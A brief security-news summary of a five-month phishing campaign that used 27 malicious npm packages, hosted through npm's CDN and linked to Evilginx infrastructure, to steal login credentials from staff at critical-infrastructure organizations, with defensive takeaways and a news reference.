27 Malicious npm Packages Used as Phishing Infrastructure to Steal Login Credentials

npm Packages as Phishing Infrastructure

Researchers have uncovered a sustained phishing campaign leveraging 27 malicious npm packages over a five-month period to steal login credentials from organizations in critical infrastructure sectors. The packages, uploaded by six different npm aliases, targeted sales and commercial personnel in the U.S. and allied nations.

Why This Matters

Modern software development relies heavily on package managers like npm, creating a large attack surface. While ideal models assume package integrity, attackers exploit this by injecting malicious code into seemingly legitimate packages. This campaign demonstrates a sophisticated, long-term effort to repurpose a trusted distribution service for credential theft, potentially causing significant financial and operational damage to targeted organizations; successful attacks can lead to data breaches, ransomware, and disruption of critical services.

Key Insights

• Sustained Campaign: Attackers maintained malicious packages for five months, demonstrating persistence.
• CDN Repurposing: Attackers leveraged npm’s CDN for resilient phishing page hosting, bypassing traditional takedown mechanisms.
• Evilginx Overlap: Infrastructure overlaps with the Evilginx phishing kit, indicating a potentially skilled adversary.

Practical Applications

• Use Case: Manufacturing and healthcare organizations are targeted by attackers seeking access to sensitive business data and systems through compromised employee credentials.
• Pitfall: Relying solely on package installation counts as a security indicator; malicious packages can remain undetected for extended periods despite low download numbers.

References:

• https://thehackernews.com/2025/12/27-malicious-npm-packages-used-as.html